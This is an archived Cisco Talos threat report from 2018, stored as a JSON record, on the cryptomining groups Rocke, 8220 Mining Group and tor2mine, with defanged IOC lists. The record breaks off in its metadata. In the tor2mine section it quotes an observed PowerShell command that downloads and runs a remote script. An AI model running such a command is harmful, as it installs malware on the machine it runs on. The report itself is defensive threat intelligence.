{ "id": "2ebdeedf-ff32-4fca-861b-fd22cc9ae865", "created_at": "2026-04-06T00:13:05.904141Z", "updated_at": "2026-04-10T13:11:19.821189Z", "deleted_at": null, "sha1_hash": "d889f8ed2f6a73de74d4c8ec846a60281b64c951", "title": "Connecting the dots between recently active cryptominers", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 560703, "plain_text": "Connecting the dots between recently active cryptominers\r\nBy Nick Biasini\r\nPublished: 2018-12-18 · Archived: 2026-04-05 14:28:28 UTC\r\nTuesday, December 18, 2018 11:33\r\nPost authored by David Liebenberg and Andrew Williams.\r\nExecutive Summary Through Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the\r\npast year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at\r\nfirst mistakenly interpreted as being attributed to a single actor. However, closer analysis revealed that a\r\nspate of illicit mining activity over the past year could be attributed to several actors that have netted them\r\nhundreds of thousands of U.S. dollars combined.\r\nThis blog examines these actors' recent campaigns, connects them to other public investigations and examines\r\ncommonalities among their toolsets and methodologies.\r\nWe will cover the recent activities of these actors:\r\nRocke —A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their\r\ncampaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache\r\nStruts2, Jenkins and JBoss.\r\n8220 Mining Group —Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker\r\nimages. The group targets Drupal, Hadoop YARN and Apache Struts2.\r\nTor2Mine —A group that uses tor2web to deliver proxy communications to a hidden service for command and\r\ncontrol (C2). These groups have used similar TTPs, including:\r\nMalicious shell scripts masquerading as JPEG files with the name \"logo*.jpg\" that install cron jobs and download\r\nand execute miners.\r\nThe use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the\r\nvictim's architecture.\r\nScanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle\r\nWebLogic and Drupal.\r\nMalicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.\r\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 1 of 13\n\nTools such as XHide Process Faker, which can hide or change the name of Linux processes and PyInstaller, which\r\ncan convert Python scripts into executables. We were also able to link these groups to other published research that\r\nhad not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation\r\nactivity that illicit cryptocurrency mining actors engaged in.\r\nThe recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. For instance, Rocke\r\nbegan developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to\r\ndeclining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on\r\nthe illicit cryptocurrency threat. However, activity on Git repositories connected to the actors demonstrates that their interest\r\nin illicit cryptocurrency mining has not completely abated. Talos published separate research today covering this trend.\r\nTimeline of actors' campaigns\r\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 2 of 13\n\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 3 of 13\n\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 4 of 13\n\nTimeline of Activity\r\nIntroduction Illicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018.\r\nThese attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the\r\nthreat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as in\r\ndelivering remote access trojans (RATs) and other malware.\r\nThrough our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared\r\nremarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. After completing\r\nanalysis of these attack's wallets and command and control (C2) servers we discovered that a spate of illicit mining activity\r\nover the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit\r\nmining.\r\nWe also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other\r\npublished research that had not always been related to the same actor, which demonstrated the breadth of exploitation\r\nactivity that illicit cryptocurrency mining actors engaged in.\r\nWe first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other\r\ngroups were using similar TTPs.\r\nWe began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining\r\nGroup. We also noticed a similar toolset being used by an actor we named \"tor2mine,\" based on the fact that they\r\nadditionally used tor2web services for C2 communications.\r\nWe also discovered some actors that share similarities to the aforementioned groups, but we could not connect them via\r\nnetwork infrastructure or cryptocurrency wallets. Through investigating all these groups, we determined that combined, they\r\nhad made hundreds of thousands of dollars in profits.\r\nRocke/Iron cybercrime group Cisco Talos wrote about Rocke earlier this year, an actor linked to the Iron Cybercrime\r\ngroup that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that\r\nincludes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts,\r\nJavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our\r\nhoneypot infrastructure.\r\nIn the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018.\r\nThrough tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was\r\nreported on by other security firms but in most instances was not attributed to one actor. Through examining these\r\ncampaigns that were not previously linked, we observed that Rocke has also targeted Jenkins and JBoss servers, continuing\r\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 5 of 13\n\nto rely on malicious Git repositories, as well as malicious Amazon Machine Images. They have also been expanding their\r\npayloads to include malware with worm-like characteristics and destructive ransomware capabilities. Several campaigns\r\nused the XHide Process Faker tool.\r\nWe have since discovered additional information that suggests that Rocke has been continuing this exploit activity. Since\r\nearly September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2\r\nssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as\r\nwell: sydwzl[.]cn.\r\nThe dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute\r\nother malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files.\r\nWhile keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new\r\nactivity. In early October, Rocke forked a repository called whatMiner, developed by a Chinese-speaking actor. WhatMiner\r\nappears to have been developed by another group called the 8220 Mining Group, which we will discuss below. The readme\r\nfor the project describes it as \"collecting and integrating all different kinds of illicit mining malware.\"\r\nGit repository for whatMiner Looking at some of the bash scripts in the repository, it appears that they scan for and\r\nexploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely\r\non a variety of Pastebin pages with Base64-encoded scripts in them that download and execute miners and backdoors\r\non to the victim's machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the\r\nChinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced\r\nthe Monero wallet in the config file with a new one.\r\nWhile looking through this repository, we found a folder called \"sustes.\" There were three samples in this folder: mr.sh, a\r\nbash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for\r\nthe miner. These scripts and malware very closely match the ones we found in our honeypots with the same file names,\r\nalthough the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet.\r\nMany of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. Rocke's C2,\r\nsydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests\r\nin late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both\r\ndomains. Both samples also made requests for a file called \"TermsHost.exe\" from an IP 39[.]108[.]177[.]252, as well as a\r\nfile called \"xmr.txt\" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called\r\n\"TermsHost.exe\" hosted on their C2 ssvs[.]space and a Monero mining config file called \"xmr.txt\" on the C2 sydwzl[.]cn.\r\nWhen we submitted both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make\r\nGET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download\r\nis an HTML text file of a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed\r\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 6 of 13\n\nthat they had numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for\r\ndistributed denial-of-service (DDoS) services.\r\nNote that Rocke activity tapered off towards the end of the year. Security researchers at Chinese company Alibaba have\r\ntaken down Rocke infrastructure that was hosted on Alibaba Cloud. In addition, there has not been activity on Rocke’s\r\ngithub since November, nor have we seen related samples in our honeypots since that time.\r\n8220 Mining Group As we previously described, Rocke originally forked a repository called \"whatMiner.\" We\r\nbelieve this tool is linked to another Chinese-speaking, Monero-mining threat actor — 8220 Mining Group — due to\r\nthe repository's config files' default wallet and infrastructure. Their C2s often communicate over port 8220, earning\r\nthem the 8220 Mining Group moniker. This group uses some similar TTPs to Rocke.\r\nWe first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. Post-exploitation, the actor would issue a\r\ncURL request for several different types of malware on their infrastructure over port 8220. The dropped malware included\r\nELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate\r\nfields. This is an example of the type of commands we observed:\r\nWe were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git\r\nrepository, with several other campaigns that the 8220 mining group is likely responsible for.\r\nThese campaigns illustrate that beyond exploiting Struts2, 8220 Mining Group has also exploited Drupal content\r\nmanagement system, Hadoop YARN, Redis, Weblogic and CouchDB. Besides leveraging malicious bash scripts, Git\r\nrepositories and image sharing services, as in whatMiner, 8220 Mining Group also carried out a long-lasting campaign using\r\nmalicious Docker images. 8220 Mining Group was able to amass nearly $200,000 worth of Monero through their\r\ncampaigns.\r\nThere were some similarities to the TTPs used by Rocke and 8220 Mining Group in these campaigns. The actors\r\ndownloaded a malicious file \"logo*.jpg\" (very similar to Rocke's use of malicious scripts under the file name of \"logo*.jpg\r\npayloads), which gets executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted\r\non .tk TLDs, Pastebin sites, and Git repositories, which we have also observed Rocke employing.\r\ntor2mine Over the past few years, Talos has been monitoring accesses for tor2web services, which serve as a bridge\r\nbetween the internet and the Tor network, a system that allows users to enable anonymous communication. These\r\nservices are useful for malware authors because they eliminate the need for malware to communicate with the Tor\r\nnetwork directly, which is suspicious and may be blocked, and allow the C2 server's IP address to be hidden.\r\nRecently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy\r\ncommunications to a hidden service for a C2: qm7gmtaagejolddt[.]onion[.]to.\r\nIt is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is\r\ndownloaded and executed to install follow-on malware onto the system:\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy\r\nBypass -Command iex ((New-Object\r\nSystem.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))\r\nWe identified additional malware on this IP, which belongs to Total Server Solutions LLC. They appear to include 64-bit and\r\n32-bit variants of XMRigCC — a variant of the XMRig miner, Windows executable versions of publically available\r\nEternalBlue/EternalRomance exploit scripts,an open-source TCP port scanner, and shellcode that downloads and executes a\r\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 7 of 13\n\nmalicious payload from the C2. Additional scripts leverage JavaScript, VBScript, PowerShell and batch scripts to avoid\r\nwriting executables to the disk.\r\nWe began to research the malware and infrastructure used in this campaign. We observed previous research on a similar\r\ncampaign. This actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability. The actor also relied on\r\nan IP hosted on Total Server Solutions LLC (107[.]181[.]160[.]197). They also employed a script, \"/win/checking-test.hta,\"\r\nthat was almost identical to one we saw hosted on the tor2mine actors C2, \"check.hta:\"\r\n/win/checking-test.hta from previous campaign\r\ncheck.hta\r\nThis actor dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw, as well. Both campaigns additionally relied on\r\nthe XHide Process-faker tool.\r\nSimilarly, in February 2018, Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT\r\nvulnerability to drop 64-bit and 32-bit variants of XMRig. The actors used many similar supporting scripts that we observed\r\nduring the tor2web campaigns, and also used a C2 hosted on Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248).\r\nThey also mined to eu[.]minerpool[.]pw.\r\nThis malware was developed in Python and then changed to ELF executables using the PyInstaller tool for distribution. This\r\nis the same technique we observed in a Rocke campaign.\r\nConclusion Through tracking the wallets of these groups, we estimate that they hold and have made payments\r\ntotaling around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands\r\nof dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made since the value of\r\nMonero is very volatile and it is difficult to tell the value of the currency when it was sold. We were also unable to\r\ntrack holdings and payments for certain kinds of wallets, such as MinerGate.\r\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 8 of 13\n\nThe value of Monero has dramatically declined in the past few months. Talos has observed less activity from these actors in\r\nour honeypots since November, although cryptocurrency-focused attacks from other actors continue.\r\nThere remains the possibility that with the value of cryptocurrencies so low, threat actors will begin delivering different\r\nkinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that pose as\r\nransomware. However, Rocke’s GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig.\r\nTalos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what\r\nchanges, if any, arise from the decline in value of cryptocurrencies.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites\r\nand detects malware used in these attacks.\r\nNetwork Security appliances such asNext-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System\r\n(NGIPS), and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether\r\nusers are on or off the corporate network.\r\nOpen Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase on Snort.org.\r\nIOCs\r\nRocke IPs:\r\n121[.]126[.]223[.]211\r\n142[.]44[.]215[.]177\r\n144[.]217[.]61[.]147\r\n118[.]24[.]150[.]172\r\n185[.]133[.]193[.]163\r\nDomains:\r\nxmr.enjoytopic[.]tk\r\nd.paloaltonetworks[.]tk\r\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 9 of 13\n\nthreatpost[.]tk\r\n3g2upl4pq6kufc4m[.]tk\r\nscan.3g2upl4pq6kufc4m[.]tk\r\ne3sas6tzvehwgpak[.]tk\r\nsample.sydwzl[.]cn\r\nblockbitcoin[.]com\r\nscan.blockbitcoin[.]tk\r\ndazqc4f140wtl[.]cloudfront[.]net\r\nd3goboxon32grk2l[.]tk\r\nenjoytopic[.]tk\r\nrealtimenews[.]tk\r\n8282[.]space\r\n3389[.]space\r\nsvss[.]space\r\nenjoytopic[.]esy[.]es\r\nlienjoy[.]esy[.]es\r\nd3oxpv9ajpsgxt[.]cloudfront[.]net\r\nd3lvemwrafj7a7[.]cloudfront[.]net\r\nd1ebv77j9rbkp6[.]enjoytopic[.]com\r\nswb[.]one\r\nd1uga3uzpppiit[.]cloudfront[.]net\r\nemsisoft[.]enjoytopic[.]tk\r\nejectrift[.]censys[.]xyz\r\nscan[.]censys[.]xyz\r\napi[.]leakingprivacy[.]tk\r\nnews[.]realnewstime[.]xyz\r\nscan[.]realnewstime[.]xyz\r\nnews[.]realtimenews[.]tk\r\nscanaan[.]tk\r\nwww[.]qicheqiche[.]com\r\nURLs:\r\nhxxps://github[.]com/yj12ni\r\nhxxps://github[.]com/rocke\r\nhxxps://github[.]com/freebtcminer/\r\nhxxps://github[.]com/tightsoft\r\nhxxps://raw[.]githubusercontent[.]com/ghostevilxp\r\nhxxp://www[.]qicheqiche[.]com\r\nhxxp://123[.]206[.]13[.]220:8899\r\nhxxps://gitee[.]com/c-888/\r\nhxxp://gitlab[.]com/c-18\r\nhxxp://www[.]ssvs[.]space/root[.]bin\r\nhxxp://a[.]ssvs[.]space/db[.]sh\r\nhxxp://a[.]ssvs[.]space/cf[.]cf\r\nhxxp://a[.]ssvs[.]space/pluto\r\nhxxp://ip[.]ssvs[.]space/xm64\r\nhxxp://ip[.]ssvs[.]space/wt[.]conf\r\nhxxp://ip[.]ssvs[.]space/mr[.]sh\r\nhxxp://a[.]ssvs[.]space/logo[.]jpg\r\nhxxp://a[.]sydwzl[.]cn/root[.]bin\r\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 10 of 13\n\nhxxp://a[.]sydwzl[.]cn/x86[.]bin\r\nhxxp://a[.]sydwzl[.]cn/bar[.]sh\r\nhxxp://a[.]sydwzl[.]cn/crondb\r\nhxxp://a[.]sydwzl[.]cn/pools[.]txt\r\nhxxps://pastebin[.]com/raw/5bjpjvLP\r\nhxxps://pastebin[.]com/raw/Fj2YdETv\r\nhxxps://pastebin[.]com/raw/eRkrSQfE\r\nhxxps://pastebin[.]com/raw/Gw7mywhC\r\nhxxp://thyrsi[.]com/t6/387/1539580368x-1566688371[.]jpg\r\nhxxp://thyrsi[.]com/t6/387/1539579140x1822611263[.]jpg\r\nhxxp://thyrsi[.]com/t6/387/1539581805x1822611359[.]jpg\r\nhxxp://thyrsi[.]com/t6/387/1539592750x-1566688347[.]jpg\r\nhxxp://thyrsi[.]com/t6/373/1537410750x-1566657908[.]jpg\r\nhxxp://thyrsi[.]com/t6/373/1537410304x-1404764882[.]jpg\r\nhxxp://thyrsi[.]com/t6/377/1538099301x-1404792622[.]jpg\r\nhxxp://thyrsi[.]com/t6/362/1535175343x-1566657675[.]jpg\r\nhxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408\r\nSHA-256:\r\n55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b root.bin\r\n00e1b4874f87d124b465b311e13565a813d93bd13d73b05e6ad9b7a08085b683 root.bin\r\ncdaa31af1f68b0e474ae1eafbf3613eafae50b8d645fef1e64743c937eff31b5 db.sh\r\n959230efa68e0896168478d3540f25adf427c7503d5e7761597f22484fc8a451 cf.cf\r\nd11fa31a1c19a541b51fcc3ff837cd3eec419403619769b3ca69c4137ba41cf3 pluto/xm64\r\nda641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08 root.bin\r\n2914917348b91c26ffd703dcef2872115e53dc0b71e23ce40ea3f88215fb2b90 wt.conf\r\nb1c585865fdb16f3696626ef831b696745894194be9138ac0eb9f6596547eed9 mr.sh\r\n7de435da46bf6bcd1843410d05c017b0306197462b0ba1d8c84d6551192de259 root.bin\r\n904261488b24dfec2a3c8dee34c12e0ae2cf4722bd06d69af3d1458cd79e8945 logo.jpg\r\nf792db9a05cde2eac63c262735d92f10e2078b6ec299ce519847b1e089069271 root.bin\r\ndcf2b7bf7f0c8b7718e47b0d7269e0d09bb1bdbf6d3248a53ff0e1c9ea5aa38d x86.bin\r\n3074b307958f6b31448006cad398b23f12119a7d0e51f24c5203a291f9e5d0ec bar.sh\r\na598aa724c45b2d8b98ec9bc34b83f21b7ae73d68d030476ebd9d89fc06afe58 cron.db\r\n74c84e47463fad4128bd4d37c4164fb58e4d7dcd880992fad16f79f20995e07e pools.txt\r\nSamples making DNS requests for sydwzl[.]cn and sbss[.]f3322[.]net:\r\n17c8a1d0e981386730a7536a68f54a7388ed185f5c63aa567d212dc672cf09e0\r\n4347d37b7ea18caacb843064dc31a6cda3c91fa7feb4d046742fd9bd985a8c86\r\nWallets\r\nrocke@live.cn\r\n44NU2ZadWJuDyVqKvzapAMSe6zR6JE99FQXh2gG4yuANW5fauZm1rPuTuycCPX3D7k2uiNc55SXL3TX8fHrbb9zQAqEM64W\r\n44FUzGBCUrwAzA2et2CRHyD57osHpmfTHAXzbqn2ycxtg2bpk792YCSLU8BPTciVFo9mowjakCLNg81WwXgN2GEtQ4uRuN3\r\n45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApS\r\n88RiksgPZR5C3Z8B51AQQQMy3zF9KFN7zUC5P5x2DYCFa8pUkY3biTQM6kYEDHWpczGMe76PedzZ6KTsrCDVWGXNRHqw\r\n8220 Gang 45[.]32[.]39[.]40:8220\r\n45[.]77[.]24[.]16\r\n54[.]37[.]57[.]99:8220\r\n67[.]21[.]81[.]179:8220\r\n67[.]231[.]243[.]10:8220\r\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 11 of 13\n\n98[.]142[.]140[.]13:8220\r\n98[.]142[.]140[.]13:3333\r\n98[.]142[.]140[.]13:8888\r\n104[.]129[.]171[.]172:8220\r\n104[.]225[.]147[.]196:8220\r\n128[.]199[.]86[.]57:8220\r\n142[.]4[.]124[.]50:8220\r\n142[.]4[.]124[.]164:8220\r\n158[.]69[.]133[.]17:8220\r\n158[.]69[.]133[.]18:8220\r\n158[.]69[.]133[.]20:3333\r\n162[.]212[.]157[.]244:8220\r\n165[.]227[.]215[.]212:8220\r\n185[.]82[.]218[.]206:8220\r\n192[.]99[.]142[.]226:8220\r\n192[.]99[.]142[.]227\r\n192[.]99[.]142[.]232:8220\r\n192[.]99[.]142[.]235:8220\r\n192[.]99[.]142[.]240:8220\r\n192[.]99[.]142[.]248:8220\r\n192[.]99[.]142[.]249:3333\r\n192[.]99[.]142[.]251:80\r\n192[.]99[.]56[.]117:8220\r\n195[.]123[.]224[.]186:8220\r\n198[.]181[.]41[.]97:8220\r\n202[.]144[.]193[.]110:3333\r\nhxxps://github[.]com/MRdoulestar/whatMiner\r\n1e43eac49ff521912db16f7a1c6b16500f7818de9f93bb465724add5b4724a13\r\ne2403b8198fc3dfdac409ea3ce313bbf12b464b60652d7e2e1bc7d6c356f7e5e\r\n31bae6f19b32b7bb7188dd4860040979cf6cee352d1135892d654a4df0df01c1\r\ncb5936e20e77f14ea7bee01ead3fb9d3d72af62b5118898439d1d11681ab0d35\r\ncfdee84680d67d4203ccd1f32faf3f13e6e7185072968d5823c1200444fdd53e\r\nefbde3d4a6a495bb7d90a266ab1e49879f8ac9c2378c6f39831a06b6b74a6803\r\n384abd8124715a01c238e90aab031fb996c4ecbbc1b58a67d65d750c7ed45c52\r\nSamples associated with whatMiner:\r\nf7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c\r\n1f5891e1b0bbe75a21266caee0323d91f2b40ecc4ff1ae8cc8208963d342ecb7\r\n3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04\r\n241916012cc4288efd2a4b1f16d1db68f52e17e174425de6abee4297f01ec64f\r\n3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04\r\nWallets\r\n41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo\r\n4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg\r\n46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S\r\nTor2mine 107[.]181[.]160[.]197\r\n107[.]181[.]174[.]248\r\n107[.]181[.]187[.]132\r\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 12 of 13\n\nasq[.]r77vh0[.]pw\r\n194[.]67[.]204[.]189\r\nqm7gmtaagejolddt[.]onion[.]to\r\nres1[.]myrms[.]pw\r\nhxxps://gitlab[.]com/Shtrawban\r\nrig[.]zxcvb[.]pw\r\nback123[.]brasilia[.]me\r\n91853a9cdbe33201bbd9838526c6e5907724eb28b3a3ae8b3e0126cee8a46639 32.exe\r\n44586883e1aa03b0400a8e394a718469424eb8c157e8760294a5c94dad3c1e19 64.exe\r\n3318c2a27daa773e471c6220b7aed4f64eb6a49901fa108a1519b3bbae81978f 7.exe\r\nc3c3eb5c8c418164e8da837eb2fdd66848e7de9085aec0fca4bb906cd69c654e 8.exe\r\n4238a0442850d3cd40f8fb299e39a7bd2a94231333c83a98fb4f8165d89f0f7f check1.ps1\r\n904c7860f635c95a57f8d46b105efc7ec7305e24bd358ac69a9728d0d548011a checker.bat\r\n4f9aeb3bb627f3cad7d23b9e0aa8e2e3b265565c24fec03282d632abbb7dac33 check.hta\r\naf780550bc8e210fac5668626afdc9f8c7ff4ef04721613f4c72e0bdf6fbbfa3 clocal.hta\r\ncc7e6b15cf2b6028673ad472ef49a80d087808a45ad0dcf0fefc8d1297ad94b5 clocal.ps1\r\nee66beae8d85f2691e4eb4e8b39182ea40fd9d5560e30b88dc3242333346ee02 cnew.hta\r\na7d5911251c1b4f54b24892e2357e06a2a2b01ad706b3bf23384e0d40a071fdb del.bat\r\n0f6eedc41dd8cf7a4ea54fc89d6dddaea88a79f965101d81de2f7beb2cbe1050 func.php\r\ne0ca80f0df651b1237381f2cbd7c5e834f0398f6611a0031d2b461c5b44815fc localcheck.bat\r\nb2498165df441bc33bdb5e39905e29a5deded7d42f07ad128da2c1303ad35488 scanner.ps1\r\n18eda64a9d79819ec1a73935cb645880d05ba26189e0fd5f2fca0a97f3f019a9 shell.bin\r\n1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc ss.exe\r\n112e3d3bb75e2bf88bd364a42a40434148d781ee89d29c66d17a5a154615e4b1 upd2.ps1\r\ne1565b21f9475b356481ddd1dcd92cdbed4f5c7111455df4ef16b82169af0577 upd.hta\r\n61185ddd3e020a3dfe5cb6ed68069052fe9832b57c605311a82185be776a3212 win10.ps1\r\nf1b55302d81f6897e4b2429f2efdad1755e6e0f2e07a1931bce4ecf1565ed481 zazd.bat\r\ncce61d346022a0192418baa7aff56ab885757f3becd357967035dd6a04bb6abf z.exe\r\nUncategorized groups 188[.]166[.]38[.]137\r\n91[.]121[.]87[.]10\r\n94[.]23[.]206[.]130\r\n46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4\r\n44dSUmMLmqUFTWjv8tcTvbQbSnecQ9sAUT5CtbwDFcfwfSz92WwG97WahMPBdGtXGu4jWFgNtTZrbAkhFYLDFf2GAwfprEg\r\nSource: https://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nhttps://blog.talosintelligence.com/cryptomining-campaigns-2018/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://blog.talosintelligence.com/cryptomining-campaigns-2018/" ], "report_names": [ "cryptomining-campaigns-2018" ], "threat_actors": [ { "id": "7c053836-8f50-4d40-bc5c-7088967e1b57", "created_at": "2022-10-25T16:07:24.549525Z", "updated_at": "2026-04-10T02:00:05.03048Z", "deleted_at": null, "main_name": "Rocke", "aliases": [ "Aged Libra", "G0106", "Iron Group", "Rocke" ], "source_name": "ETDA:Rocke", "tools": [ "Godlua", "Kerberods", "LSD", "Pro-Ocean", "Xbash" ], "source_id": "ETDA", "reports": null }, { "id": "0b8ea9bb-b729-438a-ae1f-4240db936fd7", "created_at": "2023-06-23T02:04:34.839947Z", "updated_at": "2026-04-10T02:00:04.99239Z", "deleted_at": null, "main_name": "8220 Gang", "aliases": [ "8220 Mining Group", "Returned Libra", "Water Sigbin" ], "source_name": "ETDA:8220 Gang", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "905eabd9-2b7f-483d-86bd-0c72f96b4162", "created_at": "2023-01-06T13:46:39.02749Z", "updated_at": "2026-04-10T02:00:03.185957Z", "deleted_at": null, "main_name": "Rocke", "aliases": [ "Aged Libra" ], "source_name": "MISPGALAXY:Rocke", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "942c5fbc-31df-4aef-8268-e3ccf6692ec8", "created_at": "2024-07-09T02:00:04.434476Z", "updated_at": "2026-04-10T02:00:03.671196Z", "deleted_at": null, "main_name": "Water Sigbin", "aliases": [ "8220 Gang" ], "source_name": "MISPGALAXY:Water Sigbin", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "0b02af5f-2027-42b7-a6f2-51e2fd49ba7f", "created_at": "2022-10-25T15:50:23.360509Z", "updated_at": "2026-04-10T02:00:05.337702Z", "deleted_at": null, "main_name": "Rocke", "aliases": [ "Rocke" ], "source_name": "MITRE:Rocke", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "7618565f-b8b8-4e33-b25e-3e89fdc444dd", "created_at": "2023-01-06T13:46:39.434955Z", "updated_at": "2026-04-10T02:00:03.326016Z", "deleted_at": null, "main_name": "Returned Libra", "aliases": [ "8220 Mining Group" ], "source_name": "MISPGALAXY:Returned Libra", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31", "created_at": "2023-01-06T13:46:38.376868Z", "updated_at": "2026-04-10T02:00:02.949077Z", "deleted_at": null, "main_name": "Cleaver", "aliases": [ 